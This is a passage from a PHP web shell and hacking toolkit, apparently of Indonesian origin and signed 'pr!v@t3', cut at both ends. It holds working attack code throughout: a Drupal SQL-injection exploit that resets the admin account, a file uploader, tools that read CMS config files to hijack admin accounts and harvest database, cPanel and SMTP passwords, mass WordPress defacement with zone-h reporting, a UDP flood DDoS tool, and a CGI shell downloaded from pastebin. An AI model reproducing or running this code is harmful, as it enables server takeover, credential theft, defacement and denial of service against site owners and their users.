2342 <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
2343 </form>
2344 <br>';
2345error_reporting(0);
2346$submit = $_POST['submit'];
2347$url = explode("\r\n", $_POST['url']);
2348if($submit) {
2349 foreach($url as $sites) {
2350 $log = "/user/login";
2351 $holako = "/?q=user";
2352 $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
2353 $params = array(
2354 'http' => array(
2355 'method' => 'POST',
2356 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
2357 'content' => $post_data
2358 )
2359 );
2360 $ctx = stream_context_create($params);
2361 $data = file_get_contents($sites . '/user/login/', null, $ctx);
2362 echo "<u>Testing user/login</u><br>";
2363 if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
2364 echo "Scanning: <font color=lime>$sites</font><br>";
2365 echo "Status: Successfully Xploited!<br>";
2366 echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
2367 echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
2368 } else {
2369 echo "Scanning: <font color=lime>$sites</font><br>";
2370 echo "Status: <font color=red>Not Xploited!</font><br><br>";
2371 }
2372}
2373}
2374if($submit) {
2375 foreach($url as $sites) {
2376 $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
2377 $params = array(
2378 'http' => array(
2379 'method' => 'POST',
2380 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
2381 'content' => $post_data
2382 )
2383 );
2384 $ctx = stream_context_create($params);
2385 $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
2386 echo '<u>Testing at Index</u><br>';
2387 if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
2388 echo "Scanning: <font color=lime>$sites</font><br>";
2389 echo "Status: Successfully Xploited!<br>";
2390 echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
2391 echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
2392 } else {
2393 echo "Scanning: <font color=lime>$sites</font><br>";
2394 echo "Status: <font color=red>Not Xploited!</font><br><br>";
2395 }
2396}
2397}
2398echo '</div>';
2399
2400$Drupal = $_POST['Drupal'];
2401
2402
2403if($Drupal == 'Drupal') {
2404
2405$filename = $_FILES['file']['name'];
2406$filetmp = $_FILES['file']['tmp_name'];
2407
2408echo '<form method="POST" enctype="multipart/form-data">
2409 <input type="file" name="file" />
2410 <input type="submit" value="go" />
2411
2412</form>';
2413move_uploaded_file($filetmp,$filename);
2414}
2415echo'
2416</body>
2417</html>';
2418}elseif($_GET['do'] == 'auto_edit_user') {
2419 if($_POST['hajar']) {
2420 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2421 echo "username atau password harus lebih dari 6 karakter";
2422 } else {
2423 $user_baru = $_POST['user_baru'];
2424 $pass_baru = md5($_POST['pass_baru']);
2425 $conf = $_POST['config_dir'];
2426 $scan_conf = scandir($conf);
2427 foreach($scan_conf as $file_conf) {
2428 if(!is_file("$conf/$file_conf")) continue;
2429 $config = file_get_contents("$conf/$file_conf");
2430 if(preg_match("/JConfig|joomla/",$config)) {
2431 $dbhost = ambilkata($config,"host = '","'");
2432 $dbuser = ambilkata($config,"user = '","'");
2433 $dbpass = ambilkata($config,"password = '","'");
2434 $dbname = ambilkata($config,"db = '","'");
2435 $dbprefix = ambilkata($config,"dbprefix = '","'");
2436 $prefix = $dbprefix."users";
2437 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2438 $db = mysql_select_db($dbname);
2439 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2440 $result = mysql_fetch_array($q);
2441 $id = $result['id'];
2442 $site = ambilkata($config,"sitename = '","'");
2443 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2444 echo "Config => ".$file_conf."<br>";
2445 echo "CMS => Joomla<br>";
2446 if($site == '') {
2447 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
2448 } else {
2449 echo "Sitename => $site<br>";
2450 }
2451 if(!$update OR !$conn OR !$db) {
2452 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2453 } else {
2454 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2455 }
2456 mysql_close($conn);
2457 } elseif(preg_match("/WordPress/",$config)) {
2458 $dbhost = ambilkata($config,"DB_HOST', '","'");
2459 $dbuser = ambilkata($config,"DB_USER', '","'");
2460 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2461 $dbname = ambilkata($config,"DB_NAME', '","'");
2462 $dbprefix = ambilkata($config,"table_prefix = '","'");
2463 $prefix = $dbprefix."users";
2464 $option = $dbprefix."options";
2465 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2466 $db = mysql_select_db($dbname);
2467 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2468 $result = mysql_fetch_array($q);
2469 $id = $result[ID];
2470 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2471 $result2 = mysql_fetch_array($q2);
2472 $target = $result2[option_value];
2473 if($target == '') {
2474 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2475 } else {
2476 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2477 }
2478 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2479 echo "Config => ".$file_conf."<br>";
2480 echo "CMS => Wordpress<br>";
2481 echo $url_target;
2482 if(!$update OR !$conn OR !$db) {
2483 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2484 } else {
2485 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2486 }
2487 mysql_close($conn);
2488 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
2489 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
2490 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
2491 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
2492 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
2493 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
2494 $prefix = $dbprefix."admin_user";
2495 $option = $dbprefix."core_config_data";
2496 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2497 $db = mysql_select_db($dbname);
2498 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2499 $result = mysql_fetch_array($q);
2500 $id = $result[user_id];
2501 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
2502 $result2 = mysql_fetch_array($q2);
2503 $target = $result2[value];
2504 if($target == '') {
2505 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2506 } else {
2507 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2508 }
2509 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2510 echo "Config => ".$file_conf."<br>";
2511 echo "CMS => Magento<br>";
2512 echo $url_target;
2513 if(!$update OR !$conn OR !$db) {
2514 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2515 } else {
2516 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2517 }
2518 mysql_close($conn);
2519 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2520 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2521 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2522 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2523 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2524 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2525 $prefix = $dbprefix."user";
2526 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2527 $db = mysql_select_db($dbname);
2528 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2529 $result = mysql_fetch_array($q);
2530 $id = $result[user_id];
2531 $target = ambilkata($config,"HTTP_SERVER', '","'");
2532 if($target == '') {
2533 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2534 } else {
2535 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2536 }
2537 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2538 echo "Config => ".$file_conf."<br>";
2539 echo "CMS => OpenCart<br>";
2540 echo $url_target;
2541 if(!$update OR !$conn OR !$db) {
2542 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2543 } else {
2544 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2545 }
2546 mysql_close($conn);
2547 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2548 $dbhost = ambilkata($config,'server = "','"');
2549 $dbuser = ambilkata($config,'username = "','"');
2550 $dbpass = ambilkata($config,'password = "','"');
2551 $dbname = ambilkata($config,'database = "','"');
2552 $prefix = "users";
2553 $option = "identitas";
2554 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2555 $db = mysql_select_db($dbname);
2556 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2557 $result = mysql_fetch_array($q);
2558 $target = $result[alamat_website];
2559 if($target == '') {
2560 $target2 = $result[url];
2561 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2562 if($target2 == '') {
2563 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2564 } else {
2565 $cek_login3 = file_get_contents("$target2/adminweb/");
2566 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2567 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2568 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2569 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2570 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2571 } else {
2572 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2573 }
2574 }
2575 } else {
2576 $cek_login = file_get_contents("$target/adminweb/");
2577 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2578 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2579 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2580 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2581 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2582 } else {
2583 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2584 }
2585 }
2586 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2587 echo "Config => ".$file_conf."<br>";
2588 echo "CMS => Lokomedia<br>";
2589 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
2590 echo $url_target2;
2591 } else {
2592 echo $url_target;
2593 }
2594 if(!$update OR !$conn OR !$db) {
2595 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2596 } else {
2597 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2598 }
2599 mysql_close($conn);
2600 }
2601 }
2602 }
2603 } else {
2604 echo "<center>
2605 <h1>Auto Edit User Config</h1>
2606 <form method='post'>
2607 DIR Config: <br>
2608 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2609 Set User & Pass: <br>
2610 <input type='text' name='user_baru' value='pr!v@t3' placeholder='user_baru'><br>
2611 <input type='text' name='pass_baru' value='pr!v@t3' placeholder='pass_baru'><br>
2612 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
2613 </form><br>
2614 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2615 ";
2616 }
2617} elseif($_GET['do'] == 'cpanel') {
2618 if($_POST['crack']) {
2619 $usercp = explode("\r\n", $_POST['user_cp']);
2620 $passcp = explode("\r\n", $_POST['pass_cp']);
2621 $i = 0;
2622 foreach($usercp as $ucp) {
2623 foreach($passcp as $pcp) {
2624 if(@mysql_connect('localhost', $ucp, $pcp)) {
2625 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
2626 } else {
2627 $_SESSION[$ucp] = "1";
2628 $_SESSION[$pcp] = "1";
2629 if($ucp == '' || $pcp == '') {
2630
2631 } else {
2632 $i++;
2633 if(function_exists('posix_getpwuid')) {
2634 $domain_cp = file_get_contents("/etc/named.conf");
2635 if($domain_cp == '') {
2636 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
2637 } else {
2638 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
2639 foreach($domains_cp[1] as $dj) {
2640 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2641 $user_cp_url = $user_cp_url['name'];
2642 if($user_cp_url == $ucp) {
2643 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
2644 break;
2645 }
2646 }
2647 }
2648 } else {
2649 $dom = "<font color=red>function is Disable by system</font>";
2650 }
2651 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
2652 }
2653 }
2654 }
2655 }
2656 }
2657 if($i == 0) {
2658 } else {
2659 echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>pr!v@t3.</font>";
2660 }
2661 } else {
2662 echo "<center>
2663 <form method='post'>
2664 USER: <br>
2665 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
2666 $_usercp = fopen("/etc/passwd","r");
2667 while($getu = fgets($_usercp)) {
2668 if($getu == '' || !$_usercp) {
2669 echo "<font color=red>Can't read /etc/passwd</font>";
2670 } else {
2671 preg_match_all("/(.*?):x:/", $getu, $u);
2672 foreach($u[1] as $user_cp) {
2673 if(is_dir("/home/$user_cp/public_html")) {
2674 echo "$user_cp\n";
2675 }
2676 }
2677 }
2678 }
2679 echo "</textarea><br>
2680 PASS: <br>
2681 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
2682 function cp_pass($dir) {
2683 $pass = "";
2684 $dira = scandir($dir);
2685 foreach($dira as $dirb) {
2686 if(!is_file("$dir/$dirb")) continue;
2687 $ambil = file_get_contents("$dir/$dirb");
2688 if(preg_match("/WordPress/", $ambil)) {
2689 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
2690 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
2691 $pass .= ambilkata($ambil,"password = '","'")."\n";
2692 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
2693 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
2694 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
2695 $pass .= ambilkata($ambil,'password = "','"')."\n";
2696 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
2697 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
2698 } elseif(preg_match("/^[client]$/", $ambil)) {
2699 preg_match("/password=(.*?)/", $ambil, $pass1);
2700 if(preg_match('/"/', $pass1[1])) {
2701 $pass1[1] = str_replace('"', "", $pass1[1]);
2702 $pass .= $pass1[1]."\n";
2703 } else {
2704 $pass .= $pass1[1]."\n";
2705 }
2706 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
2707 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
2708 }
2709 }
2710 echo $pass;
2711 }
2712 $cp_pass = cp_pass($dir);
2713 echo $cp_pass;
2714 echo "</textarea><br>
2715 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
2716 </form>
2717 <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
2718 }
2719} elseif($_GET['do'] == 'smtp') {
2720 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
2721 function scj($dir) {
2722 $dira = scandir($dir);
2723 foreach($dira as $dirb) {
2724 if(!is_file("$dir/$dirb")) continue;
2725 $ambil = file_get_contents("$dir/$dirb");
2726 $ambil = str_replace("$", "", $ambil);
2727 if(preg_match("/JConfig|joomla/", $ambil)) {
2728 $smtp_host = ambilkata($ambil,"smtphost = '","'");
2729 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
2730 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
2731 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
2732 $smtp_port = ambilkata($ambil,"smtpport = '","'");
2733 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
2734 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
2735 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
2736 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
2737 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
2738 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
2739 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
2740 }
2741 }
2742 }
2743 $smpt_hunter = scj($dir);
2744 echo $smpt_hunter;
2745} elseif($_GET['do'] == 'auto_wp') {
2746 if($_POST['hajar']) {
2747 $title = htmlspecialchars($_POST['new_title']);
2748 $pn_title = str_replace(" ", "-", $title);
2749 if($_POST['cek_edit'] == "Y") {
2750 $script = $_POST['edit_content'];
2751 } else {
2752 $script = $title;
2753 }
2754 $conf = $_POST['config_dir'];
2755 $scan_conf = scandir($conf);
2756 foreach($scan_conf as $file_conf) {
2757 if(!is_file("$conf/$file_conf")) continue;
2758 $config = file_get_contents("$conf/$file_conf");
2759 if(preg_match("/WordPress/", $config)) {
2760 $dbhost = ambilkata($config,"DB_HOST', '","'");
2761 $dbuser = ambilkata($config,"DB_USER', '","'");
2762 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2763 $dbname = ambilkata($config,"DB_NAME', '","'");
2764 $dbprefix = ambilkata($config,"table_prefix = '","'");
2765 $prefix = $dbprefix."posts";
2766 $option = $dbprefix."options";
2767 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2768 $db = mysql_select_db($dbname);
2769 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
2770 $result = mysql_fetch_array($q);
2771 $id = $result[ID];
2772 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2773 $result2 = mysql_fetch_array($q2);
2774 $target = $result2[option_value];
2775 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
2776 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
2777 echo "<div style='margin: 5px auto;'>";
2778 if($target == '') {
2779 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
2780 } else {
2781 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
2782 }
2783 if(!$update OR !$conn OR !$db) {
2784 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
2785 } else {
2786 echo "<font color=lime>sukses di ganti.</font><br>";
2787 }
2788 echo "</div>";
2789 mysql_close($conn);
2790 }
2791 }
2792 } else {
2793 echo "<center>
2794 <h1>Auto Edit Title+Content WordPress</h1>
2795 <form method='post'>
2796 DIR Config: <br>
2797 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2798 Set Title: <br>
2799 <input type='text' name='new_title' value='Hacked by pr!v@t3' placeholder='New Title'><br><br>
2800 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
2801 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
2802 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
2803 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
2804 </form>
2805 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2806 ";
2807 }
2808} elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
2809} elseif($_GET['do'] == 'zoneh') {
2810 if($_POST['submit']) {
2811 $domain = explode("\r\n", $_POST['url']);
2812 $nick = $_POST['nick'];
2813 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
2814 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
2815 function zoneh($url,$nick) {
2816 $ch = curl_init("http://www.zone-h.com/notify/single");
2817 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2818 curl_setopt($ch, CURLOPT_POST, true);
2819 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2820 return curl_exec($ch);
2821 curl_close($ch);
2822 }
2823 foreach($domain as $url) {
2824 $zoneh = zoneh($url,$nick);
2825 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2826 echo "$url -> <font color=lime>OK</font><br>";
2827 } else {
2828 echo "$url -> <font color=red>ERROR</font><br>";
2829 }
2830 }
2831 } else {
2832 echo "<center><form method='post'>
2833 <u>Defacer</u>: <br>
2834 <input type='text' name='nick' size='50' value='pr!v@t3'><br>
2835 <u>Domains</u>: <br>
2836 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2837 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2838 </form>";
2839 }
2840 echo "</center>";
2841}elseif($_GET['do'] == 'ddos'){
2842echo '
2843<form action="" method="post">';
2844echo "
2845<center><br><br><br>
2846Your IP: <font color='red'><b>";
2847echo $my_ip;
2848echo "
2849</b></font> (Don't DdoS yourself nub)<br><br>
2850<center>
2851<table class='tabnet' style='margin-left:35%;width:30%;padding:0 1px;'>
2852<th colspan='5'>Ddos Tool</th>
2853<tr><tr><td>IP Target</td><td>:</td>
2854<td><input type='text' class='inputz' name='ip' size='48' maxlength='25' value = '0.0.0.0' onblur = 'if ( this.value=='' ) this.value = '0.0.0.0';' onfocus = ' if ( this.value == '0.0.0.0' ) this.value = '';'/>
2855</td></tr>
2856<tr><td>Time</td><td>:</td>
2857<td><input type='text' class='inputz' name='time' size='48' maxlength='25' value = 'time (in seconds)' onblur = 'if ( this.value=='' ) this.value = 'time (in seconds)';' onfocus = ' if ( this.value == 'time (in seconds)' ) this.value = '';'/>
2858</td></tr>
2859<tr><td>Port</td><td>:</td>
2860<td><input type='text' class='inputz' name='port' size='48' maxlength='5' value = 'port' onblur = 'if ( this.value=='' ) this.value = '6969';' onfocus = ' if ( this.value == '6969' ) this.value = '';'/>
2861</td></tr></tr></b><br><tr><td>
2862<input type='submit' class='inputzbut' name='fire' value=' Firee !!! ' style='margin-left:200%;'>
2863<br><br></td></tr></table>
2864<center>
2865After initiating the DoS attack, please wait while the browser loads.
2866</center>
2867
2868</form>
2869</center>";
2870 $submit = $_POST['fire'];
2871 if (isset($submit)) {
2872 $packets = 0;
2873 $ip = $_POST['ip'];
2874 $rand = $_POST['port'];
2875 set_time_limit(0);
2876 ignore_user_abort(FALSE);
2877 $exec_time = $_POST['time'];
2878 $time = time();
2879 print "Flooded: $ip on port $rand <br><br>";
2880 $max_time = $time + $exec_time;
2881 for ($i = 0;$i < 65535;$i++) {
2882 $out.= "X";
2883 }
2884 while (1) {
2885 $packets++;
2886 if (time() > $max_time) {
2887 break;
2888 }
2889 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
2890 if ($fp) {
2891 fwrite($fp, $out);
2892 fclose($fp);
2893 }
2894 }
2895 echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
2896";
2897 }
2898} elseif($_GET['do'] == 'cgi') {
2899 $cgi_dir = mkdir('priv_cgi', 0755);
2900 $file_cgi = "priv_cgi/cgi.izo";
2901 $isi_htcgi = "AddHandler cgi-script .izo";
2902 $htcgi = fopen(".htaccess", "w");
2903 $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
2904 $cgi = fopen($file_cgi, "w");
2905 fwrite($cgi, $cgi_script);
2906 fwrite($htcgi, $isi_htcgi);
2907 chmod($file_cgi, 0755);
2908 echo "<iframe src='priv_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2909} elseif($_GET['do'] == 'fake_root') {
2910 ob_start();
2911 $cwd = getcwd();
2912 $ambil_user = explode("/", $cwd);
2913 $user = $ambil_user[2];
2914 if($_POST['reverse']) {
2915 $site = explode("\r\n", $_POST['url']);
2916 $file = $_POST['file'];
2917 foreach($site as $url) {
2918 $cek = getsource("$url/~$user/$file");
2919 if(preg_match("/hacked/i", $cek)) {
2920 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
2921 }
2922 }
2923 } else {
2924 echo "<center><form method='post'>
2925 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2926 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2927 Domain: <br>
2928 <textarea style='width: 450px; height: 250px;' name='url'>";
2929 reverse($_SERVER['HTTP_HOST']);
2930 echo "</textarea><br>
2931 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2932 </form><br>
2933 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
2934 }
2935} elseif($_GET['do'] == 'adminer') {
2936 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2937 function adminer($url, $isi) {
2938 $fp = fopen($isi, "w");
2939 $ch = curl_init();
2940 curl_setopt($ch, CURLOPT_URL, $url);
2941 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2942 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2943 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2944 curl_setopt($ch, CURLOPT_FILE, $fp);
2945 return curl_exec($ch);
2946 curl_close($ch);
2947 fclose($fp);
2948 ob_flush();
2949 flush();
2950 }
2951 if(file_exists('adminer.php')) {
2952 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2953 } else {
2954 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2955 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2956 } else {
2957 echo "<center><font color=red>gagal buat file adminer</font></center>";
2958 }
2959 }
2960} elseif($_GET['do'] == 'auto_dwp') {
2961 if($_POST['auto_deface_wp']) {
2962 function anucurl($sites) {
2963 $ch = curl_init($sites);
2964 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2965 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2966 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2967 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2968 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2969 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2970 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2971 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2972 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2973 $data = curl_exec($ch);
2974 curl_close($ch);
2975 return $data;
2976 }
2977 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2978 $post = array(
2979 "log" => "$userr",
